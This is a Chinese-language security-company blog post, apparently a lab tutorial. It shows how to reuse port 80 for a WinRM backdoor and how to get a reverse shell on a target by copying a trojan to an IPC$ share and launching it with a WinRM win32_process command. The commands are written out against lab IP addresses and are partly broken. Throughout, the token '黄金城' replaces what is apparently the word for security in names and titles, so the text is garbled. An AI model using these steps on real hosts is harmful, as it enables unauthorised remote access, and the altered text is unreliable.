• 提交需求
    *
    *

    *
    *
    *
    立即提交
    点击”立即提交”,表明我理解并同意 《黄金城科技隐私条款》

    logo

      产品与服务
      解决方案
      技术支持
      合作发展
      关于黄金城
      申请试用
        黄金城官网实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL
        发布时间:2021-01-15 阅读次数: 566 次

        WinRM(Windows Remote Management)是Windows远程管理的简称,WinRM基于Web服务管理(WS-Management)标准,使用80和443端口,可以在对方开启防火墙的情况下远程管理目标机。在Windows Server 2008 R2以上的系统中都默认开启该服务。如果防御者配置不当,攻击者在内网渗透中很可能会利用WinRM实现端口复用,进而实现内网无文件攻击反弹shell。本期黄金城黄金城官网实验室将给大家介绍相关攻击原理及方法。


        Part 1、WinRM端口复用原理


        使用Windows的远程管理服务WinRM可以实现端口复用,结合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。


        HTTP.sys驱动是IIS的主要组成部分,主要负责HTTP协议相关的处理,他有一个重要的功能是端口共享(Port Sharing)。所有基于HTTP.sys驱动的HTTP应用都可以共享同一个端口,只需要各自注册的URL前缀不相同即可。


        而WinRM就是在HTTP.sys上注册了wsman的URL前缀,默认监听在5985端口。因此,在安装了IIS的Windows服务器上,开启WinRM服务后修改默认监听端口为80即可实现端口复用,通过Web端口登录Windows服务器。使用netsh http show servicestate命令可以查看所有在HTTP.sys驱动上注册过的URL前缀。




        Part 2、端口复用配置


        对于Windows Server 2008以上的系统中,WinRM服务默认启动并监听在5985端口上。如果服务器本来就监听了80和5985端口,则我们既需要保留原本的5985监听端口,同时需要新增Winrm监听的80端口。这样的话,WinRM同时监听80和5985端口。这样既能保证原来的5985端口管理员可以正常使用,我们也能通过80端口远程连接WinRM。


        通过下面的命令,可以新增WinRM一个80端口的监听。


        Winrm set winrm/config/service

        @{EnableCompatibilityHttpLinstener=”true”}




        可以看到80和5985都在监听。




        Part 3、WinRM实现反弹SHELL


        目标机:192.168.210.102(Win 7)

        跳板机:192.168.20.35(Win10)

        攻击机:192.168.210.38(KaliLinux)


        1)在跳板机上运行winrm


        命令:winrm quickconfig




        2)在跳板机上使用net use连接目标机


        命令·:net use \192.168.210.102ipc$ “<密码>” /user:”<用户名>”




        3)将木马放置在目标机中的共享文件夹下


        命令:copy <本地木马路径>\<目标机><共享文件夹>




        4)利用跳板机内的WinRM实现无文件攻击反弹shell


        命令:winrm invoke createwmicimv2/win32_process

        @{commandline="\<目标机IP><共享文件夹目录><木马程序>"}




        攻击机成功监听到反弹shell


        上一条:每周黄金城官网速递???|Ryuk勒索软件操控者已获利1.5亿美元
        下一条:《数据黄金城官网能力成熟度模型》实践指南:数据黄金城官网策略规划
        免费试用
        服务热线

        马上咨询

        400-811-3777

        回到顶部
        【网站地图】【sitemap】